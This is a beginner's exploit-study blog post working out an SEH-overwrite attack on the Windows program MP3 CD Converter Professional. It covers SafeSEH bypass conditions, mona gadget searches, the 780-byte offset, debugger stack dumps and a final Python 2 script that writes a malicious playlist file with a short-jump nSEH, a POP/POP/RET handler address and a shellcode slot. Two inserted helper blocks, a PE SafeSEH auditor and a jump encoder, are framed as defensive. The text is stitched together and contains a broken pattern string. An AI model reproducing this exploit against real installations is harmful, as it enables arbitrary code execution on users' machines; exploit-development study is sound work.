2018. 1. 9. 21:51 · 0x04 pwnable/Windows application vulnerability analysis
SafeSEH: SafeSEH blocks SEH-based attack attempts in real time.
The /SAFESEH switch can be applied to every executable module.
Instead of protecting the stack, the exception handler frame chain is protected: if the SEH chain has been tampered with, the application does not jump to the corrupted handler but terminates. SafeSEH checks the exception handling chain for tampering before control moves to the actual handler.
You could also call this a bug bounty tip.
If the vulnerable application was not compiled with SafeSEH, or if one or more of the loaded modules was not compiled with SafeSEH, take a POP/POP/RET address from that module or from one of the application's DLL files.
Gadgets: pop pop ret, call ebp + 0x30
!mona mod
mona tells you whether the protections are present or not.
SEH stack layout
ESP + 0x8 : POP POP RET
CALL EBP + 0x30
Why are these used?
When an exception occurs, going into the SEH structure gives you the handler.
You need to look carefully at the SEH chain.
call and jmp instructions use at least 5 bytes.
CALL and JMP use absolute addresses, while SHORT JMP uses a relative address; its opcode is \xEB.
\xEB 00~7F (positive) - JMP forward on the stack
\xEB 80~FF (negative) - JMP backward on the stack
There are three ways to bypass SafeSEH.
1: If any module loaded in the program does not have SafeSEH applied, the exception handler is called.
2: If the exception handler address has been overwritten with a heap address, the exception handler is called.
3: If the exception handler address points to a memory region that is not a module loaded in the program, the exception handler is called.
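All three conditions above, and the `!mona mod` check earlier, come down to one question per module: does its PE header carry a SafeSEH handler table (or the NO_SEH flag)? The following is an added example, not code from the original post: a dependency-free reader of the IMAGE_LOAD_CONFIG_DIRECTORY that reports the same SafeSEH/ASLR/DEP state mona prints, so a defender can audit every module shipped with an application. The `build_sample_pe32` fixture is a constructed, non-runnable PE skeleton used only to exercise the parser offline.

```python
import struct
import sys

# IMAGE_OPTIONAL_HEADER.DllCharacteristics flags (PE format constants)
DYNAMIC_BASE = 0x0040   # ASLR opted in
NX_COMPAT = 0x0100      # DEP opted in
NO_SEH = 0x0400         # image declares it has no SEH handlers at all

LOAD_CONFIG_DIR = 10    # index of IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG


def _rva_to_offset(rva, sections):
    """Map an RVA to a file offset using the section table."""
    for va, vsize, raw_ptr, raw_size in sections:
        if va <= rva < va + max(vsize, raw_size):
            return rva - va + raw_ptr
    raise ValueError("RVA 0x%x is not inside any section" % rva)


def seh_report(data):
    """Report SafeSEH/ASLR/DEP state of a PE32 image held in `data` (bytes)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    fh = e_lfanew + 4                                  # IMAGE_FILE_HEADER
    num_sections = struct.unpack_from("<H", data, fh + 2)[0]
    opt_size = struct.unpack_from("<H", data, fh + 16)[0]
    opt = fh + 20                                      # IMAGE_OPTIONAL_HEADER
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic != 0x10B:
        raise ValueError("SafeSEH only exists for PE32 (magic 0x%x)" % magic)
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]
    num_dirs = struct.unpack_from("<I", data, opt + 92)[0]
    lc_rva = lc_size = 0
    if num_dirs > LOAD_CONFIG_DIR:
        lc_rva, lc_size = struct.unpack_from("<II", data, opt + 96 + LOAD_CONFIG_DIR * 8)

    sections = []
    for i in range(num_sections):
        s = opt + opt_size + i * 40
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", data, s + 8)
        sections.append((va, vsize, raw_ptr, raw_size))

    handler_table = handler_count = 0
    if lc_rva and lc_size:
        off = _rva_to_offset(lc_rva, sections)
        # IMAGE_LOAD_CONFIG_DIRECTORY32: Size at +0, SEHandlerTable at +0x40,
        # SEHandlerCount at +0x44; older, shorter structs simply lack the fields.
        if struct.unpack_from("<I", data, off)[0] >= 0x48:
            handler_table, handler_count = struct.unpack_from("<II", data, off + 0x40)

    has_table = bool(handler_table and handler_count)
    no_seh = bool(dll_chars & NO_SEH)
    return {
        "safeseh": has_table,            # what mona's "SafeSEH:" column reflects
        "no_seh": no_seh,                # dispatcher rejects any handler in this image
        "handler_count": handler_count,
        "aslr": bool(dll_chars & DYNAMIC_BASE),
        "nx": bool(dll_chars & NX_COMPAT),
        # a handler address inside this image is accepted only if it is in the
        # table; an image with neither protection accepts any address in it
        "accepts_any_handler": not (has_table or no_seh),
    }


def build_sample_pe32(safeseh, dll_chars=0):
    """Constructed test fixture: a minimal, non-runnable PE32 skeleton with one
    section and an optional load-config directory. Not a real binary."""
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<H", opt, 70, dll_chars)
    struct.pack_into("<I", opt, 92, 16)
    if safeseh:
        struct.pack_into("<II", opt, 96 + LOAD_CONFIG_DIR * 8, 0x1000, 0x48)
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, len(opt), 0x0102)
    section = b".rdata".ljust(8, b"\0") + struct.pack("<IIII", 0x100, 0x1000, 0x100, 0x200) + b"\0" * 16
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)
    img = (bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt) + section).ljust(0x200, b"\0")
    lc = bytearray(0x48)
    struct.pack_into("<I", lc, 0, 0x48)                  # Size
    if safeseh:
        struct.pack_into("<II", lc, 0x40, 0x1080, 3)     # SEHandlerTable RVA, SEHandlerCount
    return img + bytes(lc).ljust(0x100, b"\0")


if __name__ == "__main__":
    for path in sys.argv[1:]:
        with open(path, "rb") as f:
            print(path, seh_report(f.read()))
```

Run it over every EXE and DLL in an install directory; any module whose report shows `accepts_any_handler` true is the kind of module the post goes on to pull a POP/POP/RET from, and relinking it with /SAFESEH closes that door.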
call dword ptr [esp+n]
jmp dword ptr [esp+n]
call dword ptr [ebp+n]
jmp dword ptr [ebp+n]
call dword ptr [ebp-n]
jmp dword ptr [ebp-n]
call dword ptr [esp-n]
jmp dword ptr [esp-n]
esp-16, esp+8, esp+16, esp+1c, esp+2c, esp+32, esp+40 etc
ebp-18
MP3CDConverter
In OllyDbg, use Ctrl+S to find gadgets.
Gadget
POP R32
POP R32
RET
How to find CALL EBP+0x30
Search for call dword ptr ss:[ebp+0x30]
Ctrl+B (Binary) -> FF 55 30
Immunity Debugger - mona.py
After attaching to the binary, run !mona seh and look at the log data; the usable gadgets are printed.
To see absolutely everything, look at seh.txt in the Immunity Debugger directory.
There are too many.
Caution when using one: SafeSEH must be False.
0x0040793f : pop edi # pop esi # ret 0x04 | startnull,asciiprint,ascii
{PAGE_EXECUTE_READ} [MP3CDConverterPro.exe]
ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0
(C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
We will use this one.
What I learned
Because of GS, the classic attack of overwriting RET is no longer possible.
The SEH structure lives on the stack, so it can be targeted.
Because SafeSEH is registered, bypass it by executing pop/pop/ret or call ebp+0x30.
How to collect those gadgets (pop/pop/ret, call ebp+0x30)
Short JMP machine code -> relative address
Relative 00~7F (up the stack)
Relative 80~FF (down the stack)
Go into the INT3 program made earlier and look at the SEH handler.
First, because the program has INT3 set, EIP is at the next address, 00401040.
(Shift + F9)
Looking at the stack:
0012FF68 0012FFB0 Pointer to next SEH record
0012FF6C 00401785 SE handler
Reading the stack:
0012FF6C holds the SE handler, and 0012FF68 holds the Pointer to next SEH record.
Now, recalling the SafeSEH bypass learned earlier:
pop / pop / ret -> pop r32 pop r32 ret -> esp+0x8
call dword ptr ss:[ebp+0x30]
Practice
MP3 CD Converter
Get a 6000-byte payload.
The pattern we already have is 10000 bytes, so [:6000] writes only the first 6000 bytes to the file.
Then attach to MP3 CD Converter.
SEH Handler: the pattern 61423161 landed in it.
Check the position of this pattern with Immunity Debugger.
Command:
!mona pattern_offset 61423161
Log data, item 9
Address=0BADF00D
Message= - Pattern a1Ba (0x61423161) found in cyclic pattern at position 784
The offset is at 784 bytes.
So in the 6000-byte file, the SEH Handler sits at byte 784.
The gadget address I will use is 0x00407A9D. (It must have SafeSEH: False.)
next is 4 bytes before it, so it sits at byte 780.
Rewriting the payload:
seh_next = struct.pack('<L',0xFFFFFFFF) # SEH_NEXT
seh_handler = struct.pack('<L',0xFFFFFFFF) # SEH_HANDLER => POP POP RET
payload = "A" * (784-4) + seh_next + seh_handler + buf + "B" * 6000
Review: how to find POP POP RET
Attach the binary in Immunity Debugger, then !mona seh
After attaching, looking at the SEH Handler:
seh_handler location = 00100544
00407A9D
With what I wrote now, seh_next is overwritten with 0xFFFFFFFF, so it seems the pwn did not work properly.
What if I make it 0x90?
seh_next = struct.pack('<L',0x90909090) # SEH_NEXT
seh_handler = struct.pack('<L',0x00407A9D) # SEH_HANDLER => POP POP RET
payload = "A" * (784-4) + seh_next + seh_handler + buf + "B" * 6000
Ah... is seh_next not where it goes?
Let's watch the lecture and proceed.
But looking at the stack now, buf should follow seh_handler, yet 0xFFFFFFFF is there.
Back from dinner, so review.
seh handler offset: 00100544 -> points to 00407A90
Checked 00407A90, and the stack below it holds FF FF FF FF. There is no FF FF FF FF in buf.
Is it just an error?
00100534 41414141
00100538 41414141
0010053C 41414141
00100540 41414141
00100544 FFFFFFFF End of SEH chain
00100548 00407A9D SE handler
0010054C FFFFFFFF
00100550 5EF472D9
00100554 49495956
00100558 49494949
0010055C 49494949
00100560 43434343
00100564 51374343
00100568 58416A5A
0010056C 30413050
FF FF FF FF must be patched! That is, it must be avoided.
The way to avoid it is to use 0x90.
First, set a breakpoint on pop pop ret, and set a breakpoint at the address the handler points to.
Then patch the OPCODE at the address the handler points to (currently holding FF FF) to EB 10!!
seh_next = struct.pack('<L',0x909010EB) # SEH_NEXT (Short JMP)
seh_handler = struct.pack('<L',0x00407A9D) # SEH_HANDLER => POP POP RET
payload = "A" * (784-4) + seh_next + seh_handler + "\x90" * 15 + buf + "B" * 6000
Use a somewhat generous number of NOPs.
These must be jumped over.
//
0010054B 00FF ADD BH,BH
0010054D FFFF ??? ; Unknown command
0010054F FFD9 CALL FAR ECX ; Illegal use of register
//
In any case f.write(payload[:6000]) cuts it to 6000 bytes.
seh_next = struct.pack('<L',0x909010EB) # SEH_NEXT (Short JMP)
seh_handler = struct.pack('<L',0x00407A9D) # SEH_HANDLER => POP POP RET
payload = "A" * (784-4) + seh_next + seh_handler + "\x90" * 15 + buf + "B" * 6000
Ah.. I only wrote seh_handler here and did not change it in the XP environment.
Now let's solve the problem again with my own idea. There isn't only one correct answer, is there?
First, get a gadget for seh_handler.
The gadget is POP POP RET.
To find it, load the MP3 CD Converter program and enter the command in Immunity Debugger => !mona seh
A huge number of POP POP RET come out; let's use 0x0040793f.
# my_idea
seh_next = struct.pack('<L',0x90909090) # SEH_NEXT
#seh_handler = struct.pack('<L',0xFFFFFFFF) # SEH_HANDLER
# pop pop ret == seh_handler
# pop pop ret => !mona seh => must safe SEH = failed
seh_handler = struct.pack('<L',0x0040793f) # SEH_HANDLER => POP POP RET
payload = "A" * (784-4) + seh_next + seh_handler + buf + "B" * 6000
With the code written this way, looking at the SEH chain,
address 0x00100544 points to 0040793F.
That is, I confirmed that the POP POP RET I wrote is in place,
and looked at address 0x00100544 on the stack.
Many As (780 of them), then SEH_NEXT,
and the seh_next and seh_handler I entered are visible.
seh_next = 90909090
seh_handler = 0040793F
00100538 41414141
0010053C 41414141
00100540 41414141
00100544 90909090 Pointer to next SEH record
00100548 0040793F SE handler
0010054C FFFFFFFF
00100550 5EF472D9
00100554 49495956
00100558 49494949
0010055C 49494949
00100560 43434343
00100564 51374343
But... 0010054C holds a strange value, FF FF FF FF.
So.. go to 40793F and set a BP, set a BP at 0010054C too, and check.
This FF FF must be bypassed using jmp short.
First, find a place among the 49 43 bytes to jump to.
I like 0x10055F.
0010054C /EB 11 JMP SHORT 0010055F
0010054E |FFFF ??? ; Unknown command
00100550 |D972 F4 FSTENV (28-BYTE) PTR DS:[EDX-C]
00100553 |5E POP ESI
00100554 |56 PUSH ESI
00100555 |59 POP ECX
00100556 |49 DEC ECX
00100557 |49 DEC ECX
00100558 |49 DEC ECX
00100559 |49 DEC ECX
0010055A |49 DEC ECX
0010055B |49 DEC ECX
0010055C |49 DEC ECX
0010055D |49 DEC ECX
0010055E |49 DEC ECX
0010055F \49 DEC ECX
Oops.. wrong. It seems the patch must be done in Next SEH.
Go back to 00100544 and JMP SHORT to 0x10055F
00100544 /EB 19 JMP SHORT 0010055F
00100546 |90 NOP
00100547 |90 NOP
00100548 |3F AAS
00100549 |79 40 JNS SHORT 0010058B
0010054B |00FF ADD BH,BH
0010054D |FFFF ??? ; Unknown command
0010054F |FFD9 CALL FAR ECX ; Illegal use of register
00100551 ^|72 F4 JB SHORT 00100547
00100553 |5E POP ESI
00100554 |56 PUSH ESI
00100555 |59 POP ECX
00100556 |49 DEC ECX
00100557 |49 DEC ECX
00100558 |49 DEC ECX
00100559 |49 DEC ECX
0010055A |49 DEC ECX
0010055B |49 DEC ECX
0010055C |49 DEC ECX
0010055D |49 DEC ECX
0010055E |49 DEC ECX
0010055F \49 DEC ECX
So, next SEH has to be changed.
# my_idea
seh_next = struct.pack('<L',0x0010055F) # SEH_NEXT
#seh_handler = struct.pack('<L',0xFFFFFFFF) # SEH_HANDLER
# pop pop ret == seh_handler
# pop pop ret => !mona seh => must safe SEH = failed
seh_handler = struct.pack('<L',0x0040793f) # SEH_HANDLER => POP POP RET
payload = "A" * (784-4) + seh_next + seh_handler + buf + "B" * 6000
Let's try once without NOPs, because I want to know why NOPs are used.
It gets stuck at FF FF. That must be why it's called BAD CODE.
So let's write the payload again.
To reach 0x0010055f there need to be 20 0x90s.
# my_idea
seh_next = struct.pack('<L',0x0010055F) # SEH_NEXT
#seh_handler = struct.pack('<L',0xFFFFFFFF) # SEH_HANDLER
# pop pop ret == seh_handler
# pop pop ret => !mona seh => must safe SEH = failed
seh_handler = struct.pack('<L',0x0040793f) # SEH_HANDLER => POP POP RET
payload = "A" * (784-4) + seh_next + seh_handler + "\x90" * 20 + buf + "B" * 6000
Hmm, keep going until it works. I'm a beginner.
Again from the first payload: EIP is now FFFFFFFF, so
EIP to POP POP RET
seh_next to 0x90909090
seh_handler stack address 0x100544 -> points to 0040793F
SEH_NEXT: starting from 0x90909090, find a position that gets past FF FF FF FF and short jmp there
15 to reach 5a
jmp short 0x0010055a
\x90 * 15
seh_next = struct.pack('<L',0x0010055A)
seh_handler = struct.pack('<L',0x0040793F)
payload = "A" * (784-4) + seh_next + seh_handler + "\x90" * 15 + buf + "B" * 6000
SEH_NEXT does not take an address; the opcode must be inserted. My mistake was here..
Review again
Address 0x00100544 points to the seh handler (0040793F)
Reaching 0x00100544 there will be 90 90 90 90
With JMP SHORT 0x100558 or so, the opcode is EB 12, and in little-endian it must be written as 12 EB
So the seh_next payload is
seh_next = struct.pack('<L',0x909012EB)
15 0x90s (generous); it gets cut at 6000 bytes anyway, and since the cut falls elsewhere it doesn't matter
seh_next = struct.pack('<L',0x909012EB)
seh_handler = struct.pack('<L',0x0040793F)
payload = "A" * 780 + seh_next + seh_handler + "\x90" * 15 + buf + "B" * 6000
Confirmed that the calculator pops up.
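The detour through 0x0010055F, 0x909010EB and 0x909012EB above all reduces to one encoding rule: a short jmp is EB followed by a signed 8-bit displacement measured from the end of the 2-byte instruction, stored in little-endian order when packed as a dword. The following is an added example, not code from the original post, that checks every value the post arrived at and also decodes the bytes found at an overwritten nSEH slot, which is how an analyst triaging a crash dump works out where the corrupted record would have sent execution. The addresses used in the comments are the ones from the stack listings above.

```python
import struct


def encode_short_jmp(src, dst):
    """Encode `jmp short dst` for an instruction located at address `src`.
    The displacement is relative to the end of the 2-byte instruction, so the
    byte after EB is 00..7F for a forward jump and 80..FF for a backward one."""
    rel = dst - (src + 2)
    if not -128 <= rel <= 127:
        raise ValueError("0x%x is out of rel8 range from 0x%x" % (dst, src))
    return bytes([0xEB, rel & 0xFF])


def decode_short_jmp(src, code):
    """Inverse: given the two bytes found at `src`, return the branch target.
    Used when reading a dump to see where an overwritten nSEH leads."""
    if len(code) < 2 or code[0] != 0xEB:
        raise ValueError("bytes at 0x%x are not a short jmp" % src)
    return src + 2 + struct.unpack("<b", code[1:2])[0]


def nseh_dword(src, dst, pad=0x90):
    """The 32-bit value whose little-endian bytes are EB rel8 followed by two
    pad bytes, i.e. what struct.pack('<L', ...) has to receive for the nSEH slot."""
    return struct.unpack("<L", encode_short_jmp(src, dst) + bytes([pad, pad]))[0]


def first_byte_of_dword(value):
    """What the CPU fetches first if the dword is executed as code (little-endian)."""
    return struct.pack("<L", value)[0]


if __name__ == "__main__":
    # nSEH at 0x00100544 jumping to 0x00100558: EB 12, packed as 0x909012EB
    print(hex(nseh_dword(0x00100544, 0x00100558)))
    # the post's wrong attempt: packing the address 0x0010055F puts 0x5F first, not EB
    print(hex(first_byte_of_dword(0x0010055F)))
```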
Payload
#!/usr/bin/env python2
import struct
#buf
buf = ""
# Exploit Payload
#payload = '\x90' * 100 + buf + "A" * ( - 100 -len(buf))
# payload += struct.pack('<L',0xFFFFFFFF) # RET Address
#payload = A*30000
2Kg3Kg4Kg5Kg6Kg7Kg8Kg9Kh0Kh1Kh2Kh3Kh4Kh5Kh6Kh7Kh8Kh9Ki0Ki1Ki2Ki3Ki4Ki5Ki6Ki7Ki8Ki9Kj0Kj1Kj2Kj3Kj4Kj5Kj6Kj7Kj8Kj9Kk0Kk1Kk2Kk3Kk4Kk5Kk6Kk7Kk8Kk9Kl0Kl1Kl2Kl3Kl4Kl5Kl6Kl7Kl8Kl9Km0Km1Km2Km3Km4Km5Km6Km7Km8Km9Kn0Kn1Kn2Kn3Kn4Kn5Kn6Kn7Kn8Kn9Ko0Ko1Ko2Ko3Ko4Ko5Ko6Ko7Ko8Ko9Kp0Kp1Kp2Kp3Kp4Kp5Kp6Kp7Kp8Kp9Kq0Kq1Kq2Kq3Kq4Kq5Kq6Kq7Kq8Kq9Kr0Kr1Kr2Kr3Kr4Kr5Kr6Kr7Kr8Kr9Ks0Ks1Ks2Ks3Ks4Ks5Ks6Ks7Ks8Ks9Kt0Kt1Kt2Kt3Kt4Kt5Kt6Kt7Kt8Kt9Ku0Ku1Ku2Ku3Ku4Ku5Ku6Ku7Ku8Ku9Kv0Kv1Kv2Kv3Kv4Kv5Kv6Kv7Kv8Kv9Kw0Kw1Kw2Kw3Kw4Kw5Kw6Kw7Kw8Kw9Kx0Kx1Kx2Kx3Kx4Kx5Kx6Kx7Kx8Kx9Ky0Ky1Ky2Ky3Ky4Ky5Ky6Ky7Ky8Ky9Kz0Kz1Kz2Kz3Kz4Kz5Kz6Kz7Kz8Kz9La0La1La2La3La4La5La6La7La8La9Lb0Lb1Lb2Lb3Lb4Lb5Lb6Lb7Lb8Lb9Lc0Lc1Lc2Lc3Lc4Lc5Lc6Lc7Lc8Lc9Ld0Ld1Ld2Ld3Ld4Ld5Ld6Ld7Ld8Ld9Le0Le1Le2Le3Le4Le5Le6Le7Le8Le9Lf0Lf1Lf2Lf3Lf4Lf5Lf6Lf7Lf8Lf9Lg0Lg1Lg2Lg3Lg4Lg5Lg6Lg7Lg8Lg9Lh0Lh1Lh2Lh3Lh4Lh5Lh6Lh7Lh8Lh9Li0Li1Li2Li3Li4Li5Li6Li7Li8Li9Lj0Lj1Lj2Lj3Lj4Lj5Lj6Lj7Lj8Lj9Lk0Lk1Lk2Lk3Lk4Lk5Lk6Lk7Lk8Lk9Ll0Ll1Ll2Ll3Ll4Ll5Ll6Ll7Ll8Ll9Lm0Lm1Lm2Lm3Lm4Lm5Lm6Lm7Lm8Lm9Ln0Ln1Ln2Ln3Ln4Ln5Ln6Ln7Ln8Ln9Lo0Lo1Lo2Lo3Lo4Lo5Lo6Lo7Lo8Lo9Lp0Lp1Lp2Lp3Lp4Lp5Lp6Lp7Lp8Lp9Lq0Lq1Lq2Lq3Lq4Lq5Lq6Lq7Lq8Lq9Lr0Lr1Lr2Lr3Lr4Lr5Lr6Lr7Lr8Lr9Ls0Ls1Ls2Ls3Ls4Ls5Ls6Ls7Ls8Ls9Lt0Lt1Lt2Lt3Lt4Lt5Lt6Lt7Lt8Lt9Lu0Lu1Lu2Lu3Lu4Lu5Lu6Lu7Lu8Lu9Lv0Lv1Lv2Lv3Lv4Lv5Lv6Lv7Lv8Lv9Lw0Lw1Lw2Lw3Lw4Lw5Lw6Lw7Lw8Lw9Lx0Lx1Lx2Lx3Lx4Lx5Lx6Lx7Lx8Lx9Ly0Ly1Ly2Ly3Ly4Ly5Ly6Ly7Ly8Ly9Lz0Lz1Lz2Lz3Lz4Lz5Lz6Lz7Lz8Lz9Ma0Ma1Ma2Ma3Ma4Ma5Ma6Ma7Ma8Ma9Mb0Mb1Mb2Mb3Mb4Mb5Mb6Mb7Mb8Mb9Mc0Mc1Mc2Mc3Mc4Mc5Mc6Mc7Mc8Mc9Md0Md1Md2Md3Md4Md5Md6Md7Md8Md9Me0Me1Me2Me3Me4Me5Me6Me7Me8Me9Mf0Mf1Mf2Mf3Mf4Mf5Mf6Mf7Mf8Mf9Mg0Mg1Mg2Mg3Mg4Mg5Mg6Mg7Mg8Mg9Mh0Mh1Mh2Mh3Mh4Mh5Mh6Mh7Mh8Mh9Mi0Mi1Mi2Mi3Mi4Mi5Mi6Mi7Mi8Mi9Mj0Mj1Mj2Mj3Mj4Mj5Mj6Mj7Mj8Mj9Mk0Mk1Mk2Mk3Mk4Mk5Mk6Mk7Mk8Mk9Ml0Ml1Ml2Ml3Ml4Ml5Ml6Ml7Ml8Ml9Mm0Mm1Mm2Mm3Mm4Mm5Mm6Mm7Mm8Mm9Mn0Mn1Mn2Mn3Mn4Mn5Mn6Mn7Mn8Mn9Mo0Mo1Mo2Mo3Mo4Mo5Mo6Mo7Mo8Mo9Mp0Mp1Mp2Mp3Mp4Mp5Mp6Mp7Mp8Mp9Mq0Mq1Mq2Mq3Mq4Mq5Mq6Mq7Mq8Mq9Mr0Mr1Mr2Mr3Mr4Mr5Mr6Mr7Mr8Mr9Ms0Ms1Ms2Ms3Ms4Ms5Ms6Ms7Ms8Ms9Mt0Mt1Mt2Mt3Mt4Mt5Mt6Mt7Mt8Mt9Mu0Mu1Mu2Mu3Mu4Mu5Mu6Mu7Mu8M
u9Mv0Mv1Mv2M"
# offset 784 == SEH handler field (so nSEH sits at offset 780)
# lecture author choi sun
#seh_next = struct.pack('<L',0x909010EB) # SEH_NEXT
#seh_handler = struct.pack('<L',0x00407A9D) # SEH_HANDLER => POP POP RET
#payload = "A" * (784-4) + seh_next + seh_handler + "\x90" * 15 + buf + "B" * 6000
# my_idea
#seh_next = struct.pack('<L',0x90909090) # SEH_NEXT
#seh_handler = struct.pack('<L',0xFFFFFFFF) # SEH_HANDLER
# pop pop ret == seh_handler
# pop pop ret => !mona seh => must safe SEH = failed
#seh_handler = struct.pack('<L',0x0040793f) # SEH_HANDLER => POP POP RET
#payload = "A" * (784-4) + seh_next + seh_handler + buf + "B" * 6000
#seh_next = struct.pack('<L',0x90909090)
#seh_handler = struct.pack('<L',0x0040793F)
#payload = "A" * (784-4) + seh_next + seh_handler + buf + "B" * 6000
seh_next = struct.pack('<L',0x909012EB)
seh_handler = struct.pack('<L',0x0040793F)
payload = "A" * 780 + seh_next + seh_handler + "\x90" * 15 + buf + "B" * 6000
#f = open("test.m3u", "wb")
f = open("RE_myidea04.pls","wb")
f.write(payload[:6000]) # write at most 6000 bytes
f.close()